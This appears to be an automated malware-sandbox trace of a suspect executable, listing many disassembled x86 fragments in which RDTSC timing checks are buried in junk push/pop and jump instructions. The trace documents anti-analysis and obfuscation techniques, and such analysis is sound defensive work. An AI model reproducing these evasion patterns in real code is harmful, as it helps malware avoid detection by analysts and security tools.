Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310310 second address: 531034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c movsx ebx, ax 0x0000000f pushfd 0x00000010 jmp 00007FA1CCF9D8C4h 0x00000015 sbb ecx, 77181D28h 0x0000001b jmp 00007FA1CCF9D8BBh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 pushad 0x00000024 pushad 0x00000025 mov ebx, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531034E second address: 5310376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 mov di, 166Eh 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1CCCD2157h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310376 second address: 531037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531037C second address: 5310394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d pushad 0x0000000e mov di, cx 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ecx, 5519EDADh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310394 second address: 53103D0 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [75AF4538h] 0x0000000c jmp 00007FA1CCF9D8C4h 0x00000011 xor dword ptr [ebp-08h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA1CCF9D8C7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53103D0 second address: 5310468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b jmp 00007FA1CCCD2157h 0x00000010 nop 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA1CCCD2154h 0x00000018 or esi, 5366AE98h 0x0000001e jmp 00007FA1CCCD214Bh 0x00000023 popfd 0x00000024 mov ax, FC4Fh 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b call 00007FA1CCCD214Bh 0x00000030 pushad 0x00000031 popad 0x00000032 pop eax 0x00000033 mov esi, edx 0x00000035 popad 0x00000036 nop 0x00000037 jmp 00007FA1CCCD2151h 0x0000003c lea eax, dword ptr [ebp-10h] 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov di, ACBEh 0x00000046 mov bx, D6CAh 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310468 second address: 53104D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA1CCF9D8BEh 0x00000016 jmp 00007FA1CCF9D8C5h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FA1CCF9D8C0h 0x00000022 sbb eax, 04FD7818h 0x00000028 jmp 00007FA1CCF9D8BBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [ebp-18h], esp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53104D5 second address: 53104D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53104D9 second address: 53104DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53104DF second address: 531050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f jmp 00007FA1CCCD2150h 0x00000014 mov ecx, dword ptr [eax+00000FDCh] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531050F second address: 5310513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310513 second address: 5310530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310530 second address: 531055E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a pushad 0x0000000b push ebx 0x0000000c mov cx, CF4Dh 0x00000010 pop esi 0x00000011 mov di, A44Eh 0x00000015 popad 0x00000016 jns 00007FA1CCF9D8E4h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA1CCF9D8C0h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531055E second address: 5310583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d jmp 00007FA1CCCD214Fh 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310583 second address: 5310589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310589 second address: 531058D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531058D second address: 5310591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310591 second address: 53105AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FA1CCCD214Ch 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300015 second address: 5300079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA1CCF9D8C7h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA1CCF9D8C0h 0x00000016 sbb eax, 0A4C6F08h 0x0000001c jmp 00007FA1CCF9D8BBh 0x00000021 popfd 0x00000022 push ecx 0x00000023 mov ah, bh 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a pushad 0x0000002b movzx eax, bx 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA1CCF9D8BEh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300079 second address: 53000B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 pushfd 0x00000013 jmp 00007FA1CCCD214Ch 0x00000018 adc eax, 0E844EF8h 0x0000001e jmp 00007FA1CCCD214Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53000B1 second address: 53000B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53000B7 second address: 53000BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53000BB second address: 53000F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FA1CCF9D8BCh 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FA1CCF9D8C0h 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA1CCF9D8BAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53000F2 second address: 53000F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53000F6 second address: 53000FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53000FC second address: 530011F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1CCCD214Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53001E6 second address: 530020A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test al, al 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530020A second address: 5300211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300361 second address: 53003DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FA1CCF9D8C0h 0x0000000c adc esi, 578520E8h 0x00000012 jmp 00007FA1CCF9D8BBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test eax, eax 0x0000001d jmp 00007FA1CCF9D8C6h 0x00000022 jg 00007FA23D73B99Dh 0x00000028 jmp 00007FA1CCF9D8C0h 0x0000002d js 00007FA1CCF9D8F3h 0x00000033 jmp 00007FA1CCF9D8C0h 0x00000038 cmp dword ptr [ebp-14h], edi 0x0000003b pushad 0x0000003c pushad 0x0000003d mov ah, bh 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 mov bx, cx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53003DE second address: 5300407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FA23D4701FEh 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop edi 0x00000011 call 00007FA1CCCD214Ch 0x00000016 pop esi 0x00000017 popad 0x00000018 popad 0x00000019 mov ebx, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300407 second address: 530040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530040B second address: 5300411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530051C second address: 5300520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300520 second address: 5300524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300524 second address: 530052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530052A second address: 5300530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300530 second address: 5300534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300534 second address: 5300538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300538 second address: 5300557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FA1CCF9D8C3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300557 second address: 530056B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov di, 020Ah 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53005A8 second address: 5300605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA1CCF9D8BBh 0x00000013 sub eax, 512A341Eh 0x00000019 jmp 00007FA1CCF9D8C9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FA1CCF9D8C0h 0x00000025 add esi, 6BDFBA18h 0x0000002b jmp 00007FA1CCF9D8BBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300605 second address: 530061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCCD2154h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530061D second address: 52F0E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA23D73B8E6h 0x0000000e xor eax, eax 0x00000010 jmp 00007FA1CCF76FEAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 cmp esi, 00000000h 0x00000025 setne al 0x00000028 xor ebx, ebx 0x0000002a test al, 01h 0x0000002c jne 00007FA1CCF9D8B7h 0x0000002e jmp 00007FA1CCF9D9BFh 0x00000033 call 00007FA1D1CFA121h 0x00000038 mov edi, edi 0x0000003a jmp 00007FA1CCF9D8C0h 0x0000003f xchg eax, ebp 0x00000040 pushad 0x00000041 pushad 0x00000042 movzx eax, bx 0x00000045 mov edi, 1016052Ch 0x0000004a popad 0x0000004b jmp 00007FA1CCF9D8C5h 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E87 second address: 52F0E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E8D second address: 52F0E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E93 second address: 52F0E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E97 second address: 52F0EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0EA6 second address: 52F0EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0EAA second address: 52F0EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0EB0 second address: 52F0EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0EB6 second address: 52F0EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0EBA second address: 52F0EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0EBE second address: 52F0F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FA1CCF9D8C5h 0x0000000f xchg eax, ecx 0x00000010 jmp 00007FA1CCF9D8BEh 0x00000015 push eax 0x00000016 jmp 00007FA1CCF9D8BBh 0x0000001b xchg eax, ecx 0x0000001c jmp 00007FA1CCF9D8C6h 0x00000021 mov dword ptr [ebp-04h], 55534552h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA1CCF9D8C7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300A69 second address: 5300AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA1CCCD214Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FA1CCCD214Ch 0x00000019 sbb ecx, 5331B088h 0x0000001f jmp 00007FA1CCCD214Bh 0x00000024 popfd 0x00000025 jmp 00007FA1CCCD2158h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300AD1 second address: 5300AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300AD7 second address: 5300ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300ADB second address: 5300AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ecx, 4A8064A9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300AF7 second address: 5300B81 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dh, al 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA1CCCD2153h 0x00000012 jmp 00007FA1CCCD2153h 0x00000017 popfd 0x00000018 push eax 0x00000019 pushfd 0x0000001a jmp 00007FA1CCCD214Fh 0x0000001f add cx, 14EEh 0x00000024 jmp 00007FA1CCCD2159h 0x00000029 popfd 0x0000002a pop eax 0x0000002b popad 0x0000002c cmp dword ptr [75AF459Ch], 05h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA1CCCD2159h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300B81 second address: 5300B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300B85 second address: 5300B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300B8B second address: 5300B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300B91 second address: 5300B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300C09 second address: 5300C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8C1h 0x00000008 mov eax, 599C14E7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 17D6E32Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA1CCF9D8C9h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300D49 second address: 5300D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300D4D second address: 5300D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53109AE second address: 53109B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53109B4 second address: 53109B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53109B8 second address: 53109CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1CCCD214Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53109CE second address: 5310A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1CCF9D8BFh 0x00000009 adc esi, 5AE7504Eh 0x0000000f jmp 00007FA1CCF9D8C9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310A03 second address: 5310A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1CCCD2153h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310A22 second address: 5310A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310A3A second address: 5310B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA1CCCD2154h 0x00000014 and ecx, 612B4188h 0x0000001a jmp 00007FA1CCCD214Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FA1CCCD2158h 0x00000026 jmp 00007FA1CCCD2155h 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, esi 0x0000002e jmp 00007FA1CCCD214Eh 0x00000033 push eax 0x00000034 jmp 00007FA1CCCD214Bh 0x00000039 xchg eax, esi 0x0000003a jmp 00007FA1CCCD2156h 0x0000003f mov esi, dword ptr [ebp+0Ch] 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FA1CCCD214Eh 0x00000049 xor al, FFFFFFD8h 0x0000004c jmp 00007FA1CCCD214Bh 0x00000051 popfd 0x00000052 mov ah, 82h 0x00000054 popad 0x00000055 test esi, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FA1CCCD214Eh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310B0E second address: 5310B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 57E06DE4h 0x00000008 jmp 00007FA1CCF9D8BDh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007FA23D71B147h 0x00000016 pushad 0x00000017 mov si, DE03h 0x0000001b mov eax, 5A81575Fh 0x00000020 popad 0x00000021 cmp dword ptr [75AF459Ch], 05h 0x00000028 jmp 00007FA1CCF9D8C2h 0x0000002d je 00007FA23D7331FDh 0x00000033 pushad 0x00000034 call 00007FA1CCF9D8BEh 0x00000039 mov si, 2BD1h 0x0000003d pop ecx 0x0000003e push ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
